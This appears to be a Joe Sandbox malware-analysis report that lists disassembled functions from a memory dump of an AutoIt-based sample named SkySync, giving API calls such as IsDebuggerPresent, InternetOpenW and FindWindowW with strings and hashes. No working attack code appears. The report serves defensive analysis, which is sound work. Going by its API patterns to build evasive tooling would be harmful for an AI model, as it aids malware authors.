Opcode Fuzzy Hash: cc95cb0d89db854a95bc3f1a3d847bcdd8dac5a6f0f94e2113b24d871d4fd808
Instruction Fuzzy Hash: FFC19E756083459FC714EF64C981A6FB7E4BF85350F00492DF9998B2A2DB30ED45CB92

Function 00AEBE8C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00AEC057

Strings

Container, xrefs: 00AEBFD4
AutoIt3GUI, xrefs: 00AEBFCF

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 2aa800bb8c0ecfd4a9368c0ab65f57330f0ae4a58bf799c5dedfb617ea12aa4d
Instruction ID: a0b589eb95296d20b57cde7696bb8c719b926cab97d9e1639625d75518468d57
Opcode Fuzzy Hash: 2aa800bb8c0ecfd4a9368c0ab65f57330f0ae4a58bf799c5dedfb617ea12aa4d
Instruction Fuzzy Hash: 61914B70610201EFDB24DF69C884A6ABBF9FF49710F14856DF94ACB291DB71E941CB60

Function 00A9E00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00A9E01E
GlobalMemoryStatusEx.KERNEL32(?), ref: 00A9E037

Strings

@, xrefs: 00A9E02B

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 06b910bce08c3e0d23574ad1f44b782181d589e4a02e16fb0f2154c9c8259e4e
Instruction ID: eec2f3953048ac2367790b3fda10b73bad961cfd7bfe748c6b3d939b280d5905
Opcode Fuzzy Hash: 06b910bce08c3e0d23574ad1f44b782181d589e4a02e16fb0f2154c9c8259e4e
Instruction Fuzzy Hash: 04517A71508B449BE320AF50E885BAFBBF8FF88319F51484DF1D8410A1EB709529CB56

Function 00B18096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00B18186
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B1819B

Strings

', xrefs: 00B180EF

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 94083e3e890a1fdcc1ecc1c140280f7361c103b128767339b8713b877681afea
Instruction ID: 74f550deec29df722b183d17516ed9776908f8719965ea4dda3446f0523a5a51
Opcode Fuzzy Hash: 94083e3e890a1fdcc1ecc1c140280f7361c103b128767339b8713b877681afea
Instruction Fuzzy Hash: 13412875A00309AFDB10CF64D881BDA7BF5FB09300F5040AAE908AB351DB31A996CF90

Function 00B17088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00B1713C
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B17178

Strings

static, xrefs: 00B170D8

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 2157882b341d0bbd130313e8227aceb7871a40871c8ab1f4157ec0844b2dff65
Instruction ID: 0e44b360ae843fd7f81778263b4bd6cdc17c8910e7b81f0a2f50bbaf74aa3d31
Opcode Fuzzy Hash: 2157882b341d0bbd130313e8227aceb7871a40871c8ab1f4157ec0844b2dff65
Instruction Fuzzy Hash: 1E319C71240604AAEB109F78DC80EFB77F9FF48720F509659F9A997191DB30AC91CBA0

Function 00B16CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B16D86
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B16D91

Strings

Combobox, xrefs: 00B16D53

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: dd96260b8b0f14ee56e24b90c69460c9766bcc8bb02f805807d71dc24def7276
Instruction ID: d7316615b9fa32f12949e91f02208cebb98fc3861dc0d97aca5b52559e61d849
Opcode Fuzzy Hash: dd96260b8b0f14ee56e24b90c69460c9766bcc8bb02f805807d71dc24def7276
Instruction Fuzzy Hash: 0911B6713102087FEF159E54EC81FFB3BAAEB84364F514179F9149B290DA319C918760

Function 00B1722C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00A92111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A9214F
Part of subcall function 00A92111: GetStockObject.GDI32(00000011), ref: 00A92163
Part of subcall function 00A92111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A9216D

GetWindowRect.USER32(00000000,?), ref: 00B17296
GetSysColor.USER32(00000012), ref: 00B172B0

Strings

static, xrefs: 00B17273

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 3c9aa399e8e309ab82217df5c1d7d32bc488fc955f3a8f886426f22e994d14a3
Instruction ID: 2074d6c3bfadc181a734b7d6cb1574f7dc069ccd6ec8816c17da5284433ca413
Opcode Fuzzy Hash: 3c9aa399e8e309ab82217df5c1d7d32bc488fc955f3a8f886426f22e994d14a3
Instruction Fuzzy Hash: AA21477265420AAFDB04DFA8DC45EFA7BF8EB08304F004658FD55D3251EA34E8919B90

Function 00B16F45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00B16FC7
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B16FD6

Strings

edit, xrefs: 00B16FAB

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 5a84e3bef42930b2597df79feae94747d01919b5d6a20d8096992df0f74cc2f2
Instruction ID: 36187f57459eb636ed1443767d214a2f5820644aab6f1bd78ea27bfdb9f5f363
Opcode Fuzzy Hash: 5a84e3bef42930b2597df79feae94747d01919b5d6a20d8096992df0f74cc2f2
Instruction Fuzzy Hash: 0F118F71100208AFEB105E64EC84EFB3BAAEB15364F904764F964931E0CB35DC929B60

Function 00B028A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B028F8
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B02921

Strings

<local>, xrefs: 00B028E9

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: f40e73cf3a3eb37eff79c075899ddc1bb32fd75688f1398e5890d3fb5c681e07
Instruction ID: 3a42415736cf06626300d2eed2728c3810827041abfb084c8f69ff20ca5d558e
Opcode Fuzzy Hash: f40e73cf3a3eb37eff79c075899ddc1bb32fd75688f1398e5890d3fb5c681e07
Instruction Fuzzy Hash: F211CE74501325BAEB298B518C8CEBBFFE8EF05350F1081AAF90542180E3706898EAE0

Function 00B08475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B086E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00B0849D,?,00000000,?,?), ref: 00B086F7

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B084A0
htons.WSOCK32(00000000,?,00000000), ref: 00B084DD

Strings

255.255.255.255, xrefs: 00B084B8

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: d88d0af07878380d60d2b2aa2ffb423a24d811ac9d2492373e36241bbfc60e6f
Instruction ID: 3f26121fec0a5e37da75613122c8d7c5b2f9b2f328ad2dcd0c25bcabc3975ced
Opcode Fuzzy Hash: d88d0af07878380d60d2b2aa2ffb423a24d811ac9d2492373e36241bbfc60e6f
Instruction Fuzzy Hash: D6110831100206ABCB20EF64CC86FAEB764FF04320F104566F915573D2DF71A911D755

Function 00AE99BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AEB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00AEB7BD

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00AE9A2B

Strings

ListBox, xrefs: 00AE99F5
ComboBox, xrefs: 00AE99CA

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ClassMessageNameSend
String ID: ComboBox$ListBox
API String ID: 3678867486-1403004172
Opcode ID: 2670343367cbb9b964725cbcc9f9e5355d4d180e22133cd0d2e5829f0d307250
Instruction ID: 4f409d2ad7720478e4ba4ec488e4e706a3f155a824a47aa2b2cd3dd3c9f574f0
Opcode Fuzzy Hash: 2670343367cbb9b964725cbcc9f9e5355d4d180e22133cd0d2e5829f0d307250
Instruction Fuzzy Hash: 8201F175A52224AB8B14EFA5CD52CFF73A9AF52360F000619F8A2532D1EF3059089660

Function 00AE98B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AEB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00AEB7BD

SendMessageW.USER32(?,00000180,00000000,?), ref: 00AE9923

Strings

ListBox, xrefs: 00AE98ED
ComboBox, xrefs: 00AE98C2

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ClassMessageNameSend
String ID: ComboBox$ListBox
API String ID: 3678867486-1403004172
Opcode ID: d767fd68bbd16608e7cf0435ce1819685330384a4dfb3e022766f65d7aca8ffb
Instruction ID: c9c046a5513a61f77c814fe95c7bea25c4229aeeb1fbe15034fa51cecc02849d
Opcode Fuzzy Hash: d767fd68bbd16608e7cf0435ce1819685330384a4dfb3e022766f65d7aca8ffb
Instruction Fuzzy Hash: 6101A7B5A922047BCB14FBA1CA56EFF73AC9F16340F100119B845632D2DB105F0896B1

Function 00AE993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AEB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00AEB7BD

SendMessageW.USER32(?,00000182,?,00000000), ref: 00AE99A6

Strings

ListBox, xrefs: 00AE9972
ComboBox, xrefs: 00AE9947

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ClassMessageNameSend
String ID: ComboBox$ListBox
API String ID: 3678867486-1403004172
Opcode ID: 8ca1361453dac5aa5ba4435fd019a292293966aa64d75d136cf61c2bb65d98c9
Instruction ID: 6aa2dd8a1df600f6d1dfa84f3d9b1f219c5be3667d3206a85367b229a340ca14
Opcode Fuzzy Hash: 8ca1361453dac5aa5ba4435fd019a292293966aa64d75d136cf61c2bb65d98c9
Instruction Fuzzy Hash: AB01DB76A462047BCB10FBA5CB52EFF73AC9F12340F100019B845632D2DB145F0896B1

Function 00AE8892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00AE88A0

Strings

Error allocating memory., xrefs: 00AE8899
AutoIt, xrefs: 00AE8894

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: cb9f782f28fcfd0baaa275cd4f22bfc575945fa67394308d797b484f5dda7fcc
Instruction ID: 21974428a32f68473a3534654db2e22e694fb43855270a49f3b46667e59524fe
Opcode Fuzzy Hash: cb9f782f28fcfd0baaa275cd4f22bfc575945fa67394308d797b484f5dda7fcc
Instruction Fuzzy Hash: 94D05B3339535836D22533E46D1BFCA7E8C8B05B91F104466FB0CB65D38ED5959142D6

Function 00ACB4F1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00AB0B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00ACB520,?,?,?,00A9100A), ref: 00AB0B79

IsDebuggerPresent.KERNEL32(?,?,?,00A9100A), ref: 00ACB524
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00A9100A), ref: 00ACB533

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00ACB52E

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 6a49a82feab716551deb506e18704a6cf2fdb78adbc5b574fd98b7a2cb7fef06
Instruction ID: 6ed1d9f2746e77e081b066d7581ad2b2dfbae1d8e96d351e290d9437392eb10e
Opcode Fuzzy Hash: 6a49a82feab716551deb506e18704a6cf2fdb78adbc5b574fd98b7a2cb7fef06
Instruction Fuzzy Hash: 49E06DB02103118FD330AF29E905B427AE4AF04705F11896DE446C3342DFB6D544CBA1

Function 00AD0251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00AD0091

Part of subcall function 00B0C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,00AD027A,?), ref: 00B0C6E7
Part of subcall function 00B0C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00B0C6F9

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00AD0289

Strings

WIN_XPe, xrefs: 00AD00A4

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 40031bb2cac7d736ae4c6110a3d6a20dc7629efc145b5fda08d727328c7ec5da
Instruction ID: f52e339df21f57540f6f33dc6387c80612f934805512966249df493fc79da75f
Opcode Fuzzy Hash: 40031bb2cac7d736ae4c6110a3d6a20dc7629efc145b5fda08d727328c7ec5da
Instruction Fuzzy Hash: BFF0ED71815109EFCB25DBA4D998BECBBF8AB08301F281086E147B7291CB714F85DF21

Function 00AF9EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00AF9EB5
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00AF9ECC

Strings

aut, xrefs: 00AF9EC6

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 05cee38ae6514a668aa81494a9bdbd1723df62948a10c5f9a9200d93890b531c
Instruction ID: d37de3929a93094e40efcc24a267ce5df2b83b1b3590cf852bba135dcb0d6aca
Opcode Fuzzy Hash: 05cee38ae6514a668aa81494a9bdbd1723df62948a10c5f9a9200d93890b531c
Instruction Fuzzy Hash: 93D05E7554030DABDB60AB90DC0EFDABB7CDB04700F0042A2BF58921A3DE7096958BA1

Function 00B15FA1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B15FAB
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00B15FBE

Part of subcall function 00AF57FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AF5877

Strings

Shell_TrayWnd, xrefs: 00B15FA4

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 03630cbf71dbbc6e328d4593d9506db928a9454d81a2bfaa44b343b9d1cc0c8c
Instruction ID: aae768571e0e51626b4fd1430b8a7511c8f31f27d957405f5e3899216f57fd3f
Opcode Fuzzy Hash: 03630cbf71dbbc6e328d4593d9506db928a9454d81a2bfaa44b343b9d1cc0c8c
Instruction Fuzzy Hash: 26D0A9313A0320AAE234B7B09C4BFA63A50BB10B00F000824B35AAA1D1CDF098018780

Function 00B15FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B15FEB
PostMessageW.USER32(00000000), ref: 00B15FF2

Part of subcall function 00AF57FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AF5877

Strings

Shell_TrayWnd, xrefs: 00B15FE4

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 25d57794aff5f0d0e29c4aeb4992bf6d5fcc03ab045aeadcb8b93ce084485231
